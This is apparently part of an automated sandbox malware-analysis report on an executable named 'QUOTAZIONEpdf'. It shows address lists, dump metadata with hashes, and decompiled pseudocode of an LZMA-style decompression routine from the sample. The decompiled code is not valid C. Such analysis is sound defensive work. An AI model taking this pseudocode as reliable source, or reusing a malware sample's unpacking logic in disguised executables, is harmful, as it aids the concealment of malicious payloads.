                0x0040608f
                0x0040608f
                0x00406084
                0x00406084
                0x00406084
                0x00406099
                0x0040609c
                0x004060ba
                0x004060bc
                0x00000000
                0x0040609e
                0x0040609e
                0x004060a1
                0x004060a4
                0x004060a7
                0x004060a9
                0x004060a9
                0x004060a9
                0x004060ac
                0x004060af
                0x004060b1
                0x004060b2
                0x004060b5
                0x00000000
                0x004060b5
                0x00000000
                0x004062eb
                0x004062ef
                0x0040630d
                0x00406310
                0x00406317
                0x0040631a
                0x0040631d
                0x00406320
                0x00406323
                0x00406326
                0x00406328
                0x0040632f
                0x00406330
                0x00406332
                0x00406335
                0x00406338
                0x0040633b
                0x0040633b
                0x00406340
                0x00000000
                0x00406340
                0x004062f1
                0x004062f4
                0x004062f7
                0x00406301
                0x004066b8
                0x004066b8
                0x004066b8
                0x00000000
                0x004066b8
                0x00000000
                0x00406355
                0x00406359
                0x0040637c
                0x0040637f
                0x00406382
                0x0040638c
                0x0040635b
                0x0040635b
                0x0040635e
                0x00406361
                0x00406364
                0x00406371
                0x00406374
                0x00406374
                0x004066b8
                0x004066b8
                0x004066b8
                0x00000000
                0x004066b8
                0x00000000
                0x00406398
                0x0040639c
                0x00000000
                0x00000000
                0x004063a2
                0x004063a6
                0x00000000
                0x00000000
                0x004063ac
                0x004063ae
                0x004063b2
                0x004063b2
                0x004063b5
                0x004063b9
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00406430
                0x00406434
                0x0040643b
                0x0040643e
                0x00406441
                0x00406436
                0x00406436
                0x00406436
                0x00406444
                0x00406447
                0x00000000
                0x00000000
                0x004064f0
                0x004064f0
                0x004064f4
                0x00406892
                0x00000000
                0x00406892
                0x004064fa
                0x004064fd
                0x00406500
                0x00406504
                0x00406507
                0x0040650d
                0x0040650f
                0x0040650f
                0x0040650f
                0x00406512
                0x00406515
                0x00000000
                0x00000000
                0x004060e5
                0x004060e5
                0x004060e9
                0x00406856
                0x00000000
                0x00406856
                0x004060ef
                0x004060f2
                0x004060f5
                0x004060f9
                0x004060fc
                0x00406102
                0x00406104
                0x00406104
                0x00406104
                0x00406107
                0x0040610a
                0x0040610a
                0x0040610d
                0x00406110
                0x00000000
                0x00000000
                0x00406116
                0x0040611c
                0x00000000
                0x00000000
                0x00406122
                0x00406122
                0x00406126
                0x00406129
                0x0040612c
                0x0040612f
                0x00406132
                0x00406133
                0x00406136
                0x00406138
                0x0040613e
                0x00406141
                0x00406144
                0x00406147
                0x0040614a
                0x0040614d
                0x00406150
                0x0040616c
                0x0040616f
                0x00406172
                0x00406175
                0x0040617c
                0x00406180
                0x00406182
                0x00406186
                0x00406152
                0x00406152
                0x00406156
                0x0040615e
                0x00406163
                0x00406165
                0x00406167
                0x00406167
                0x00406189
                0x00406190
                0x00406193
                0x00000000
                0x00406199
                0x00000000
                0x00406199
                0x00000000
                0x0040619e
                0x0040619e
                0x004061a2
                0x00406862
                0x00000000
                0x00406862
                0x004061a8
                0x004061ab
                0x004061ae
                0x004061b2
                0x004061b5
                0x004061bb
                0x004061bd
                0x004061bd
                0x004061bd
                0x004061c0
                0x004061c3
                0x004061c3
                0x004061c3
                0x004061c9
                0x00000000
                0x00000000
                0x004061cb
                0x004061ce
                0x004061d1
                0x004061d4
                0x004061d7
                0x004061da
                0x004061dd
                0x004061e0
                0x004061e3
                0x004061e6
                0x004061e9
                0x00406201
                0x00406204
                0x00406207
                0x0040620a
                0x0040620a
                0x0040620d
                0x00406211
                0x00406213
                0x004061eb
                0x004061eb
                0x004061f3
                0x004061f8
                0x004061fa
                0x004061fc
                0x004061fc
                0x00406216
                0x0040621d
                0x00406220
                0x00000000
                0x00406222
                0x00000000
                0x00406222
                0x00406220
                0x00406227
                0x00406227
                0x00406227
                0x00406227
                0x00000000
                0x00000000
                0x00406262
                0x00406262
                0x00406266
                0x0040686e
                0x00000000
                0x0040686e
                0x0040626c
                0x0040626f
                0x00406272
                0x00406276
                0x00406279
                0x0040627f
                0x00406281
                0x00406281
                0x00406281
                0x00406284
                0x00406287
                0x00406287
                0x0040628d
                0x0040622b
                0x0040622b
                0x0040622e
                0x00000000
                0x0040622e
                0x0040628f
                0x0040628f
                0x00406292
                0x00406295
                0x00406298
                0x0040629b
                0x0040629e
                0x004062a1
                0x004062a4
                0x004062a7
                0x004062aa
                0x004062ad
                0x004062c5
                0x004062c8
                0x004062cb
                0x004062ce
                0x004062ce
                0x004062d1
                0x004062d5
                0x004062d7
                0x004062af
                0x004062af
                0x004062b7
                0x004062bc
                0x004062be
                0x004062c0
                0x004062c0
                0x004062da
                0x004062e1
                0x004062e4
                0x00000000
                0x004062e6
                0x00000000
                0x004062e6
                0x00000000
                0x00406573
                0x00406573
                0x00406577
                0x0040689e
                0x00000000
                0x0040689e
                0x0040657d
                0x00406580
                0x00406583
                0x00406587
                0x0040658a
                0x00406590
                0x00406592
                0x00406592
                0x00406592
                0x00406595
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00406682
                0x00406686
                0x004066a8
                0x004066ab
                0x004066b5
                0x004066b8
                0x004066b8
                0x004066b8
                0x00000000
                0x004066b8
                0x004066b8
                0x00406688
                0x0040668b
                0x0040668f
                0x00406692
                0x00406692
                0x00406695
                0x00000000
                0x00000000
                0x0040673f
                0x00406743
                0x00406761
                0x00406761
                0x00406761
                0x00406768
                0x0040676f
                0x00406776
                0x00406776
                0x00000000
                0x00406776
                0x00406745
                0x00406748
                0x0040674b
                0x0040674e
                0x00406755
                0x00406699
                0x00406699
                0x0040669c
                0x00000000
                0x00000000
                0x00406830
                0x00406833
                0x00406734
                0x00000000
                0x00000000
                0x0040646a
                0x0040646c
                0x00406473
                0x00406474
                0x00406476
                0x00406479
                0x00000000
                0x00000000
                0x00406481
                0x00406484
                0x00406487
                0x00406489
                0x0040648b
                0x0040648b
                0x0040648c
                0x0040648f
                0x00406496
                0x00406499
                0x004064a7
                0x00000000
                0x00000000
                0x0040677d
                0x0040677d
                0x00406780
                0x00406787
                0x00000000
                0x00000000
                0x0040678c
                0x0040678c
                0x00406790
                0x004068c8
                0x00000000
                0x004068c8
                0x00406796
                0x00406799
                0x0040679c
                0x004067a0
                0x004067a3
                0x004067a9
                0x004067ab
                0x004067ab
                0x004067ab
                0x004067ae
                0x004067b1
                0x004067b1
                0x004067b1
                0x004067b1
                0x004067b4
                0x004067b4
                0x004067b8
                0x00406818
                0x0040681b
                0x00406820
                0x00406821
                0x00406823
                0x00406825
                0x00406828
                0x00406734
                0x00406734
                0x00000000
                0x0040673a
                0x00406734
                0x004067ba
                0x004067c0
                0x004067c3
                0x004067c6
                0x004067c9
                0x004067cc
                0x004067cf
                0x004067d2
                0x004067d5
                0x004067d8
                0x004067db
                0x004067f4
                0x004067f7
                0x004067fa
                0x004067fd
                0x00406801
                0x00406803
                0x00406803
                0x00406804
                0x00406807
                0x004067dd
                0x004067dd
                0x004067e5
                0x004067ea
                0x004067ec
                0x004067ef
                0x004067ef
                0x0040680a
                0x00406811
                0x00000000
                0x00406813
                0x00000000
                0x00406813
                0x00000000
                0x004064af
                0x004064b2
                0x004064e8
                0x00406618
                0x00406618
                0x00406618
                0x00406618
                0x0040661b
                0x0040661b
                0x0040661e
                0x00406620
                0x004068aa
                0x00000000
                0x004068aa
                0x00406626
                0x00406629
                0x00000000
                0x00000000
                0x0040662f
                0x00406633
                0x00406636
                0x00406636
                0x00406636
                0x00000000
                0x00406636
                0x004064b4
                0x004064b6
                0x004064b8
                0x004064ba
                0x004064bd
                0x004064be
                0x004064c0
                0x004064c2
                0x004064c5
                0x004064c8
                0x004064de
                0x004064e3
                0x0040651b
                0x0040651b
                0x0040651f
                0x0040654b
                0x0040654d
                0x00406554
                0x00406557
                0x0040655a
                0x0040655a
                0x0040655f
                0x0040655f
                0x00406561
                0x00406564
                0x0040656b
                0x0040656e
                0x0040659b
                0x0040659b
                0x0040659e
                0x004065a1
                0x00406615
                0x00406615
                0x00406615
                0x00000000
                0x00406615
                0x004065a3
                0x004065a9
                0x004065ac
                0x004065af
                0x004065b2
                0x004065b5
                0x004065b8
                0x004065bb
                0x004065be
                0x004065c1
                0x004065c4
                0x004065dd
                0x004065df
                0x004065e2
                0x004065e3
                0x004065e6
                0x004065e8
                0x004065eb
                0x004065ed
                0x004065ef
                0x004065f2
                0x004065f4
                0x004065f7
                0x004065fb
                0x004065fd
                0x004065fd
                0x004065fe
                0x00406601
                0x00406604
                0x004065c6
                0x004065c6
                0x004065ce
                0x004065d3
                0x004065d5
                0x004065d8
                0x004065d8
                0x00406607
                0x0040660e
                0x00406598
                0x00406598
                0x00406598
                0x00406598
                0x00000000
                0x00406610
                0x00000000
                0x00406610
                0x0040660e
                0x00406521
                0x00406524
                0x00406526
                0x00406529
                0x0040652c
                0x0040652f
                0x00406531
                0x00406534
                0x00406537
                0x00406537
                0x0040653a
                0x0040653a
                0x0040653d
                0x00406544
                0x00406518
                0x00406518
                0x00406518
                0x00406518
                0x00000000
                0x00406546
                0x00000000
                0x00406546
                0x00406544
                0x004064ca
                0x004064cd
                0x004064cf
                0x004064d2
                0x00000000
                0x00000000
                0x00406231
                0x00406231
                0x00406235
                0x0040687a
                0x00000000
                0x0040687a
                0x0040623b
                0x0040623e
                0x00406241
                0x00406244
                0x00406247
                0x0040624a
                0x0040624d
                0x0040624f
                0x00406252
                0x00406255
                0x00406258
                0x0040625a
                0x0040625a
                0x0040625a
                0x00000000
                0x00000000
                0x004063bc
                0x004063bc
                0x004063c0
                0x00406886
                0x00000000
                0x00406886
                0x004063c6
                0x004063c9
                0x004063cc
                0x004063cf
                0x004063d1
                0x004063d1
                0x004063d1
                0x004063d4
                0x004063d7
                0x004063da
                0x004063dd
                0x004063e0
                0x004063e3
                0x004063e4
                0x004063e6
                0x004063e6
                0x004063e6
                0x004063e9
                0x004063ec
                0x004063ef
                0x004063f2
                0x004063f2
                0x004063f2
                0x004063f5
                0x004063f7
                0x004063f7
                0x00000000
                0x00000000
                0x00406639
                0x00406639
                0x00406639
                0x0040663d
                0x00000000
                0x00000000
                0x00406643
                0x00406646
                0x00406649
                0x0040664c
                0x0040664e
                0x0040664e
                0x0040664e
                0x00406651
                0x00406654
                0x00406657
                0x0040665a
                0x0040665d
                0x00406660
                0x00406661
                0x00406663
                0x00406663
                0x00406663
                0x00406666
                0x00406669
                0x0040666c
                0x0040666f
                0x00406672
                0x00406676
                0x00406678
                0x0040667b
                0x00000000
                0x0040667d
                0x004063fa
                0x004063fa
                0x00000000
                0x004063fa
                0x0040667b
                0x004068b0
                0x00000000
                0x00000000
                0x00405edf
                0x004068e7
                0x004068e7
                0x00000000
                0x004068e7
                0x00406734
                0x004066bb
                0x004066b8
                0x00000000
                0x0040640d

                Memory Dump Source
                • Source File: 00000001.00000002.300595966.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.300589722.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000001.00000002.300601525.0000000000407000.00000002.00020000.sdmp
                • Associated: 00000001.00000002.300605629.0000000000409000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300623029.0000000000422000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300631122.0000000000429000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300636246.000000000042C000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_QUOTAZIONEpdf.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 26fed0205269c67c4524460d7550c555d61838a406f219378ffc8409cc06287b
                • Instruction ID: b59dca7a73cfed8a049a6b6a8b4acb584d685fa01604791ee1d6e054a78b3619
                • Opcode Fuzzy Hash: 26fed0205269c67c4524460d7550c555d61838a406f219378ffc8409cc06287b
                • Instruction Fuzzy Hash: 08714671D04229CFEF28CF98C844BADBBB1FB44305F15816AD816BB281C7789996DF54
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 98%
                			E00406355() {
                				unsigned short _t531;
                				signed int _t532;
                				void _t533;
                				signed int _t534;
                				signed int _t535;
                				signed int _t565;
                				signed int _t568;
                				signed int _t589;
                				signed int* _t606;
                				void* _t613;
                
                				L0:
                				while(1) {
                					L0:
                					if( *(_t613 - 0x40) != 0) {
                						 *(_t613 - 0x84) = 0xa;
                						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
                					} else {
                						 *(__ebp - 0x84) = 9;
                						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                					}
                					while(1) {
                						 *(_t613 - 0x54) = _t606;
                						while(1) {
                							L133:
                							_t531 =  *_t606;
                							_t589 = _t531 & 0x0000ffff;
                							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                							if( *(_t613 - 0xc) >= _t565) {
                								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                								 *(_t613 - 0x40) = 1;
                								_t532 = _t531 - (_t531 >> 5);
                								 *_t606 = _t532;
                							} else {
                								 *(_t613 - 0x10) = _t565;
                								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                								 *_t606 = (0x800 - _t589 >> 5) + _t531;
                							}
                							if( *(_t613 - 0x10) >= 0x1000000) {
                								goto L139;
                							}
                							L137:
                							if( *(_t613 - 0x6c) == 0) {
                								 *(_t613 - 0x88) = 5;
                								L170:
                								_t568 = 0x22;
                								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                								_t535 = 0;
                								L172:
                								return _t535;
                							}
                							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                							L139:
                							_t533 =  *(_t613 - 0x84);
                							while(1) {
                								 *(_t613 - 0x88) = _t533;
                								while(1) {
                									L1:
                									_t534 =  *(_t613 - 0x88);
                									if(_t534 > 0x1c) {
                										break;
                									}
                									switch( *((intOrPtr*)(_t534 * 4 +  &M004068EF))) {
                										case 0:
                											if( *(_t613 - 0x6c) == 0) {
                												goto L170;
                											}
                											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                											_t534 =  *( *(_t613 - 0x70));
                											if(_t534 > 0xe1) {
                												goto L171;
                											}
                											_t538 = _t534 & 0x000000ff;
                											_push(0x2d);
                											asm("cdq");
                											_pop(_t570);
                											_push(9);
                											_pop(_t571);
                											_t609 = _t538 / _t570;
                											_t540 = _t538 % _t570 & 0x000000ff;
                											asm("cdq");
                											_t604 = _t540 % _t571 & 0x000000ff;
                											 *(_t613 - 0x3c) = _t604;
                											 *(_t613 - 0x1c) = (1 << _t609) - 1;
                											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
                											_t612 = (0x300 << _t604 + _t609) + 0x736;
                											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                												L10:
                												if(_t612 == 0) {
                													L12:
                													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                													goto L15;
                												} else {
                													goto L11;
                												}
                												do {
                													L11:
                													_t612 = _t612 - 1;
                													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                												} while (_t612 != 0);
                												goto L12;
                											}
                											if( *(_t613 - 4) != 0) {
                												GlobalFree( *(_t613 - 4));
                											}
                											_t534 = GlobalAlloc(0x40, 0x600); // executed
                											 *(_t613 - 4) = _t534;
                											if(_t534 == 0) {
                												goto L171;
                											} else {
                												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                												goto L10;
                											}
                										case 1:
                											L13:
                											__eflags =  *(_t613 - 0x6c);
                											if( *(_t613 - 0x6c) == 0) {
                												 *(_t613 - 0x88) = 1;
                												goto L170;
                											}
                											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                											_t45 = _t613 - 0x48;
                											 *_t45 =  *(_t613 - 0x48) + 1;
                											__eflags =  *_t45;
                											L15:
                											if( *(_t613 - 0x48) < 4) {
                												goto L13;
                											}
                											_t546 =  *(_t613 - 0x40);
                											if(_t546 ==  *(_t613 - 0x74)) {
                												L20:
                												 *(_t613 - 0x48) = 5;
                												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                												goto L23;
                											}
                											 *(_t613 - 0x74) = _t546;
                											if( *(_t613 - 8) != 0) {
                												GlobalFree( *(_t613 - 8));
                											}
                											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                											 *(_t613 - 8) = _t534;
                											if(_t534 == 0) {
                												goto L171;
                											} else {
                												goto L20;
                											}
                										case 2:
                											L24:
                											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                											 *(_t613 - 0x84) = 6;
                											 *(_t613 - 0x4c) = _t553;
                											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
                											 *(_t613 - 0x54) = _t606;
                											goto L133;
                										case 3:
                											L21:
                											__eflags =  *(_t613 - 0x6c);
                											if( *(_t613 - 0x6c) == 0) {
                												 *(_t613 - 0x88) = 3;
                												goto L170;
                											}
                											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                											_t67 = _t613 - 0x70;
                											 *_t67 =  &(( *(_t613 - 0x70))[1]);
                											__eflags =  *_t67;
                											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                											L23:
                											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                											if( *(_t613 - 0x48) != 0) {
                												goto L21;
                											}
                											goto L24;
                										case 4:
                											L133:
                											_t531 =  *_t606;
                											_t589 = _t531 & 0x0000ffff;
                											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                											if( *(_t613 - 0xc) >= _t565) {
                												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                												 *(_t613 - 0x40) = 1;
                												_t532 = _t531 - (_t531 >> 5);
                												 *_t606 = _t532;
                											} else {
                												 *(_t613 - 0x10) = _t565;
                												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                												 *_t606 = (0x800 - _t589 >> 5) + _t531;
                											}
                											if( *(_t613 - 0x10) >= 0x1000000) {
                												goto L139;
                											}
                										case 5:
                											goto L137;
                										case 6:
                											__edx = 0;
                											__eflags =  *(__ebp - 0x40);
                											if( *(__ebp - 0x40) != 0) {
                												__eax =  *(__ebp - 4);
                												__ecx =  *(__ebp - 0x38);
                												 *(__ebp - 0x34) = 1;
                												 *(__ebp - 0x84) = 7;
                												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                												while(1) {
                													 *(_t613 - 0x54) = _t606;
                													goto L133;
                												}
                											}
                											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                											__esi =  *(__ebp - 0x60);
                											__cl = 8;
                											__cl = 8 -  *(__ebp - 0x3c);
                											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                											__ecx =  *(__ebp - 0x3c);
                											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                											__ecx =  *(__ebp - 4);
                											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                											__eflags =  *(__ebp - 0x38) - 4;
                											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                											if( *(__ebp - 0x38) >= 4) {
                												__eflags =  *(__ebp - 0x38) - 0xa;
                												if( *(__ebp - 0x38) >= 0xa) {
                													_t98 = __ebp - 0x38;
                													 *_t98 =  *(__ebp - 0x38) - 6;
                													__eflags =  *_t98;
                												} else {
                													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                												}
                											} else {
                												 *(__ebp - 0x38) = 0;
                											}
                											__eflags =  *(__ebp - 0x34) - __edx;
                											if( *(__ebp - 0x34) == __edx) {
                												__ebx = 0;
                												__ebx = 1;
                												goto L61;
                											} else {
                												__eax =  *(__ebp - 0x14);
                												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                												__eflags = __eax -  *(__ebp - 0x74);
                												if(__eax >=  *(__ebp - 0x74)) {
                													__eax = __eax +  *(__ebp - 0x74);
                													__eflags = __eax;
                												}
                												__ecx =  *(__ebp - 8);
                												__ebx = 0;
                												__ebx = 1;
                												__al =  *((intOrPtr*)(__eax + __ecx));
                												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                												goto L41;
                											}
                										case 7:
                											__eflags =  *(__ebp - 0x40) - 1;
                											if( *(__ebp - 0x40) != 1) {
                												__eax =  *(__ebp - 0x24);
                												 *(__ebp - 0x80) = 0x16;
                												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                												__eax =  *(__ebp - 0x28);
                												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                												__eax =  *(__ebp - 0x2c);
                												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                												__eax = 0;
                												__eflags =  *(__ebp - 0x38) - 7;
                												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                												__al = __al & 0x000000fd;
                												__eax = (__eflags >= 0) - 1 + 0xa;
                												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                												__eax =  *(__ebp - 4);
                												__eax =  *(__ebp - 4) + 0x664;
                												__eflags = __eax;
                												 *(__ebp - 0x58) = __eax;
                												goto L69;
                											}
                											__eax =  *(__ebp - 4);
                											__ecx =  *(__ebp - 0x38);
                											 *(__ebp - 0x84) = 8;
                											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                											while(1) {
                												 *(_t613 - 0x54) = _t606;
                												goto L133;
                											}
                										case 8:
                											goto L0;
                										case 9:
                											__eflags =  *(__ebp - 0x40);
                											if( *(__ebp - 0x40) != 0) {
                												goto L89;
                											}
                											__eflags =  *(__ebp - 0x60);
                											if( *(__ebp - 0x60) == 0) {
                												goto L171;
                											}
                											__eax = 0;
                											__eflags =  *(__ebp - 0x38) - 7;
                											_t258 =  *(__ebp - 0x38) - 7 >= 0;
                											__eflags = _t258;
                											0 | _t258 = _t258 + _t258 + 9;
                											 *(__ebp - 0x38) = _t258 + _t258 + 9;
                											goto L75;
                										case 0xa:
                											__eflags =  *(__ebp - 0x40);
                											if( *(__ebp - 0x40) != 0) {
                												__eax =  *(__ebp - 4);
                												__ecx =  *(__ebp - 0x38);
                												 *(__ebp - 0x84) = 0xb;
                												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                												while(1) {
                													 *(_t613 - 0x54) = _t606;
                													goto L133;
                												}
                											}
                											__eax =  *(__ebp - 0x28);
                											goto L88;
                										case 0xb:
                											__eflags =  *(__ebp - 0x40);
                											if( *(__ebp - 0x40) != 0) {
                												__ecx =  *(__ebp - 0x24);
                												__eax =  *(__ebp - 0x20);
                												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                											} else {
                												__eax =  *(__ebp - 0x24);
                											}
                											__ecx =  *(__ebp - 0x28);
                											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                											L88:
                											__ecx =  *(__ebp - 0x2c);
                											 *(__ebp - 0x2c) = __eax;
                											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                											L89:
                											__eax =  *(__ebp - 4);
                											 *(__ebp - 0x80) = 0x15;
                											__eax =  *(__ebp - 4) + 0xa68;
                											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                											goto L69;
                										case 0xc:
                											L99:
                											__eflags =  *(__ebp - 0x6c);
                											if( *(__ebp - 0x6c) == 0) {
                												 *(__ebp - 0x88) = 0xc;
                												goto L170;
                											}
                											__ecx =  *(__ebp - 0x70);
                											__eax =  *(__ebp - 0xc);
                											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                											_t334 = __ebp - 0x70;
                											 *_t334 =  *(__ebp - 0x70) + 1;
                											__eflags =  *_t334;
                											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                											__eax =  *(__ebp - 0x2c);
                											goto L101;
                										case 0xd:
                											L37:
                											__eflags =  *(__ebp - 0x6c);
                											if( *(__ebp - 0x6c) == 0) {
                												 *(__ebp - 0x88) = 0xd;
                												goto L170;
                											}
                											__ecx =  *(__ebp - 0x70);
                											__eax =  *(__ebp - 0xc);
                											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                											_t122 = __ebp - 0x70;
                											 *_t122 =  *(__ebp - 0x70) + 1;
                											__eflags =  *_t122;
                											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                											L39:
                											__eax =  *(__ebp - 0x40);
                											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                												goto L48;
                											}
                											__eflags = __ebx - 0x100;
                											if(__ebx >= 0x100) {
                												goto L54;
                											}
                											L41:
                											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                											__ecx =  *(__ebp - 0x58);
                											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                											 *(__ebp - 0x48) = __eax;
                											__eax = __eax + 1;
                											__eax = __eax << 8;
                											__eax = __eax + __ebx;
                											__esi =  *(__ebp - 0x58) + __eax * 2;
                											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                											__ax =  *__esi;
                											 *(__ebp - 0x54) = __esi;
                											__edx = __ax & 0x0000ffff;
                											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                											__eflags =  *(__ebp - 0xc) - __ecx;
                											if( *(__ebp - 0xc) >= __ecx) {
                												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                												__cx = __ax;
                												 *(__ebp - 0x40) = 1;
                												__cx = __ax >> 5;
                												__eflags = __eax;
                												__ebx = __ebx + __ebx + 1;
                												 *__esi = __ax;
                											} else {
                												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                												 *(__ebp - 0x10) = __ecx;
                												0x800 = 0x800 - __edx;
                												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                												__ebx = __ebx + __ebx;
                												 *__esi = __cx;
                											}
                											__eflags =  *(__ebp - 0x10) - 0x1000000;
                											 *(__ebp - 0x44) = __ebx;
                											if( *(__ebp - 0x10) >= 0x1000000) {
                												goto L39;
                											} else {
                												goto L37;
                											}
                										case 0xe:
                											L46:
                											__eflags =  *(__ebp - 0x6c);
                											if( *(__ebp - 0x6c) == 0) {
                												 *(__ebp - 0x88) = 0xe;
                												goto L170;
                											}
                											__ecx =  *(__ebp - 0x70);
                											__eax =  *(__ebp - 0xc);
                											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
